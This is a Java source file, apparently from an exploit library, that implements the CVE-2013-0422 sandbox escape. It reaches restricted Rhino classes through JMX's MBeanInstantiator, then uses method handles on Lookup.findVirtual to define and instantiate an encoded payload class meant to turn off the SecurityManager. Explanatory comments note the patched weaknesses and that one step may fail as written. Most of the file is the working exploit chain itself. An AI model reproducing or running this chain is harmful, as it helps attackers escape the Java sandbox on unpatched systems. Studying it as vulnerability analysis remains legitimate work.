
/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.Method;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

@SuppressWarnings("rawtypes")
public class CVE_2013_0422a {

  public static String byteArrayWithSecOff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
  // Lookup shared by the reflective helpers below; assigned in disableSecurity() and read
  // by createCustomClass()/createClassLoader(). Unset (null) until disableSecurity() runs.
  private static MethodHandles.Lookup lookup;

  /**
   * Entry point: installs a default {@link SecurityManager}, reports it, runs the
   * {@link #disableSecurity()} chain and reports the manager again so the effect
   * (manager present before, expected absent after) is visible on stdout.
   *
   * @param args ignored
   * @throws Throwable anything raised by {@link #disableSecurity()}; nothing is caught here
   */
  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    reportSecurityManager();
    disableSecurity();
    reportSecurityManager();
  }

  // Prints the currently installed security manager (or "null" when none is installed).
  private static void reportSecurityManager() {
    String line = "SecurityManager: " + System.getSecurityManager();
    System.out.println(line);
  }
 
  /**
   * Reproduces the CVE-2013-0422 sandbox-escape chain as a demonstration.
   *
   * <p>Sequence, as written below: a {@code JmxMBeanServer} is built to reach its
   * {@code MBeanInstantiator}; {@code findClass} on that instantiator resolves two classes
   * from the internal Rhino package {@code sun.org.mozilla.javascript.internal}; a public
   * {@code Lookup} is then driven through a method handle on {@code Lookup.findVirtual} to
   * obtain handles on those classes; finally the class encoded in
   * {@link #byteArrayWithSecOff} is defined through the resulting loader and instantiated.
   *
   * <p>Defender's note: the two weaknesses this relies on are that, in affected releases,
   * {@code MBeanInstantiator.findClass} loaded restricted-package classes without the
   * package-access check that {@code Class.forName} applies, and that invoking the
   * caller-sensitive {@code Lookup.findVirtual} through a method handle made its access
   * check run against a trusted frame. Both were addressed in the vendor's fix for this
   * CVE, and the {@code SecurityManager} model itself is deprecated in current JDKs.
   *
   * @throws Throwable any failure from the reflective calls below; nothing is caught here
   */
  private static void disableSecurity() throws Throwable {
      // Building the server directly gives access to its MBeanInstantiator, which is the
      // class-lookup primitive used next.
      JmxMBeanServer beanServer = (JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("", null, null);
      MBeanInstantiator beanInstantiator = beanServer.getMBeanInstantiator();
      ClassLoader a = null;
      // Class resolution goes through the instantiator rather than Class.forName with a null
      // loader: this is the first half of the vulnerability described in the Javadoc above.
      Class contextClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
      Class generatedClassLoaderClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
     
      // A public lookup carries no special access on its own; the chain depends on how
      // Lookup.findVirtual behaved when it was itself invoked through a handle (second half).
      lookup = MethodHandles.publicLookup();
     
      // In this variant no Context instance is created: createContextObject returns null.
      Object contextObject = createContextObject(contextClass, lookup);
     
      // Handle on Lookup.findVirtual(Class, String, MethodType) itself; every later member
      // lookup on the Rhino classes is routed through this handle.
      MethodType findVirtualType = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
      MethodHandle findVirtualHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", findVirtualType);
     
      Object classLoader = createClassLoader(contextClass, generatedClassLoaderClass, contextObject, findVirtualHandle);
      Class customClass = createCustomClass(generatedClassLoaderClass, findVirtualHandle, classLoader);
     
      // Instantiation runs the decoded class's static initialiser and constructor; judging by
      // the field name and the printout in main(), the payload is expected to remove the
      // security manager.
      customClass.newInstance();
  }

  /**
   * Defines the class encoded in {@link #byteArrayWithSecOff} through the supplied loader.
   *
   * <p>A handle for {@code GeneratedClassLoader.defineClass(String, byte[])} is resolved by
   * invoking {@code findVirtualHandle} (a handle on {@code Lookup.findVirtual}) with the
   * shared {@link #lookup}; that handle is then invoked on {@code classLoader} with a
   * {@code null} class name and the hex-decoded bytes.
   *
   * @param generatedClassLoaderClass the Rhino {@code GeneratedClassLoader} class resolved in
   *     {@link #disableSecurity()}
   * @param findVirtualHandle handle on {@code Lookup.findVirtual(Class, String, MethodType)}
   * @param classLoader the loader instance to define the class in
   * @return the newly defined class
   * @throws Throwable any failure from handle resolution or from the {@code defineClass} call
   */
  private static Class createCustomClass(Class generatedClassLoaderClass, MethodHandle findVirtualHandle,
      Object classLoader) throws Throwable {
    // Signature of defineClass(String name, byte[] data) returning Class.
    MethodType defineClassType = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
    // Resolved indirectly: findVirtual is called through its own handle, not directly on lookup.
    MethodHandle defineClassHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, generatedClassLoaderClass,
        "defineClass", defineClassType });
   
    // Receiver is the loader; the name argument is null (presumably taken from the class
    // file itself — not verifiable from this file), the data is the decoded payload.
    Class customClass = (Class) defineClassHandle.invokeWithArguments(new Object[] { classLoader, null, hex2Byte(byteArrayWithSecOff) });
    return customClass;
  }

  /**
   * Obtains a Rhino {@code GeneratedClassLoader} by invoking
   * {@code Context.createClassLoader(ClassLoader)} through method handles.
   *
   * <p>The handle is resolved by invoking {@code findVirtualHandle} with the shared
   * {@link #lookup}, then invoked with {@code contextObject} as receiver and a {@code null}
   * parent loader.
   *
   * <p>NOTE(review): {@code contextObject} is {@code null} in this variant (see
   * {@link #createContextObject}). A handle obtained via {@code findVirtual} is an instance
   * handle, so a null receiver is expected to fail; whether this step ever completes
   * cannot be confirmed from this file.
   *
   * @param contextClass the Rhino {@code Context} class
   * @param generatedClassLoaderClass the Rhino {@code GeneratedClassLoader} class (return
   *     type of the resolved method)
   * @param contextObject receiver for the call; {@code null} as passed by the caller here
   * @param findVirtualHandle handle on {@code Lookup.findVirtual(Class, String, MethodType)}
   * @return the object returned by {@code createClassLoader}
   * @throws Throwable any failure from handle resolution or invocation
   */
  private static Object createClassLoader(Class contextClass, Class generatedClassLoaderClass, Object contextObject,
      MethodHandle findVirtualHandle) throws Throwable {
    // Signature of createClassLoader(ClassLoader parent) returning GeneratedClassLoader.
    MethodType createClassLoaderType = MethodType.methodType(generatedClassLoaderClass, ClassLoader.class);
    MethodHandle createClassLoaderHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, contextClass,
        "createClassLoader", createClassLoaderType });
   
    // First element is the receiver, second is the (null) parent loader.
    Object classLoader = createClassLoaderHandle.invokeWithArguments(new Object[] { contextObject, null });
    return classLoader;
  }

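  /**
   * Placeholder for obtaining a Rhino {@code Context} instance; this variant never creates
   * one and always returns {@code null}.
   *
   * <p>The previous body reflectively looked up {@code Lookup.findConstructor} and
   * unreflected it without ever using the result, next to commented-out code. Both were dead
   * and have been removed so that the method's actual behaviour — return {@code null} — is
   * explicit. The signature, including the declared exceptions, is unchanged for callers.
   *
   * @param contextClass the Rhino {@code Context} class (unused)
   * @param lookup the lookup that would resolve the constructor (unused; shadows the static
   *     field of the same name)
   * @return always {@code null}
   * @throws NoSuchMethodException never thrown by this stub; retained for compatibility
   * @throws IllegalAccessException never thrown by this stub; retained for compatibility
   * @throws Throwable never thrown by this stub; retained for compatibility
   */
  private static Object createContextObject(Class contextClass, MethodHandles.Lookup lookup) throws NoSuchMethodException, IllegalAccessException,
      Throwable {
    return null;
  }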

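  /**
   * Decodes a hexadecimal string into bytes, two characters per byte.
   *
   * @param paramString hex text of even length; upper- or lower-case digits
   * @return the decoded bytes; an empty array for an empty string
   * @throws IllegalArgumentException if the length is odd (the original silently dropped the
   *     trailing nibble)
   * @throws NumberFormatException if any character is not a hexadecimal digit
   * @throws NullPointerException if {@code paramString} is {@code null}
   */
  public static byte[] hex2Byte(String paramString) {
    int length = paramString.length();
    if ((length & 1) != 0) {
      throw new IllegalArgumentException("hex string has odd length: " + length);
    }
    byte[] arrayOfByte = new byte[length / 2];
    for (int i = 0; i < arrayOfByte.length; i++) {
      int hi = Character.digit(paramString.charAt(2 * i), 16);
      int lo = Character.digit(paramString.charAt(2 * i + 1), 16);
      // Character.digit returns -1 for anything that is not a radix-16 digit; unlike
      // Integer.parseInt this also rejects a leading '+' or '-' inside a byte pair.
      if (hi < 0 || lo < 0) {
        throw new NumberFormatException(
            "invalid hex digit at index " + (2 * i) + ": " + paramString.substring(2 * i, 2 * i + 2));
      }
      arrayOfByte[i] = (byte) ((hi << 4) | lo);
    }
    return arrayOfByte;
  }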
}